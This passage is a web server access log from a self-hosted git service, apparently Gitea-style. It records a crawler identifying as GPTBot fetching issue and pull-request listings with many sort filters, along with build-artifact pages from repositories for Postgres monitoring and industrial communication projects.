"https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 9855] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:19:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fdirectory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 25380] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftarget-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 27651] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcodemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 27046] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fdirectory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 25392] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcodemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 26663] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fdirectory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 25368] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftarget-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 29131] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftoolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 26754] [Gzip 5.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 36056] [Gzip 10.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 24397] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 24350] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:19:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211050] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:47:06 +0000] - 200 200 - GET https 